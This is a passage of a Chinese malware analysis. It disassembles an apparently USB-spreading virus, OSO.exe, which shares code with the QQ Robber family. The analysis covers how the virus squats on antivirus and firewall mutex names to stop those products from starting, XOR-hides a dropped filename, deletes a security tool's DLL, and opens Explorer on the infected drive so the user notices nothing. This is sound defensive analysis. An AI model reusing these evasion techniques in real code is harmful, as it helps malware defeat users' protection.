堆栈 ss:[001279E8]=00CC0304, (ASCII "DllMutex_QQRobber2.0")

这里并不是启动杀软,而是病毒自己用 CreateMutexA 创建了这些杀软/防火墙用来保证单实例的互斥量名。不少安全软件启动时发现同名互斥量已存在就会认为自己已在运行而退出,所以这是一种"占坑"式的对抗手段(推测,需对照对应产品验证)。ExeMutex_QQRobber2.0 / DllMutex_QQRobber2.0 则说明该样本与 QQ大盗 家族共用代码或互斥量,可作为判定家族的特征:
0040B086 68 81B24000 push dumped_.0040B281 ; ASCII "SKYNET_PERSONAL_FIREWALL"
0040B08B 6A FF push -1
0040B08D 6A 00 push 0
0040B08F E8 AD94FFFF call dumped_.00404541
00404557 E8 DDFFFFFF call <jmp.&kernel32.CreateMutexA>

创建的互斥量名有这些(分别对应 3721、天网防火墙、金山毒霸等产品,ASSISTSHELLMUTEX 归属不明):
0040B06A push dumped_.0040B25D ASCII "AntiTrojan3721"
0040B078 push OSO.0040B26D ASCII "ASSISTSHELLMUTEX"
0040B086 push OSO.0040B281 ASCII "SKYNET_PERSONAL_FIREWALL"
0040B094 push OSO.0040B29D ASCII "KingsoftAntivirusScanProgram7Mutex"

4.13 可能还释放 verclsid.dat(密文 "r`t`hvog*agw" 用 04 05 06 03 异或即得 verclsid.dat;文件内容和用途未分析):
0040B35B mov eax,OSO.0040B3AD ASCII "r`t`hvog*agw"
0012D230 00EE030C |NewFileName = "D:\winnt\system32\verclsid.dat"

4.14 删除卡卡助手:
0040B532 mov edx,OSO.0040B6E5 ASCII "kakatool.dll"
0040B545 E8 1F90FFFF call <jmp.&kernel32.DeleteFileA>

4.15 如果自身是从 d:~i: 根目录的 OSO.exe 启动(即用户双击了被感染的盘符),则直接运行,并用 ShellExecuteA(0,"open","Explorer.exe","i:\") 打开该盘符的资源管理器窗口,让用户看起来像正常打开了U盘(推断,判断逻辑没有贴全):
0040C2A6 B8 DDCD4000 mov eax,OSO.0040CDDD ; ASCII "d:\OSO.exe"
0040C2E6 B8 0DCE4000 mov eax,OSO.0040CE0D ; ASCII "e:\OSO.exe"
0040C326 B8 25CE4000 mov eax,OSO.0040CE25 ; ASCII "f:\OSO.exe"
0040C366 B8 3DCE4000 mov eax,OSO.0040CE3D ; ASCII "g:\OSO.exe"
0040C3A6 B8 55CE4000 mov eax,OSO.0040CE55 ; ASCII "h:\OSO.exe"
0040C3E6 B8 6DCE4000 mov eax,OSO.0040CE6D ; ASCII "i:\OSO.exe"

0040C3FF 68 79CE4000 push dumped_.0040CE79 ; ASCII "i:\"
0040C404 68 EDCD4000 push dumped_.0040CDED ; ASCII "Explorer.exe"
0040C409 68 FDCD4000 push dumped_.0040CDFD ; ASCII "open"
0040C40E 6A 00 push 0
0040C410 E8 3484FFFF call <jmp.&shell32.ShellExecuteA>
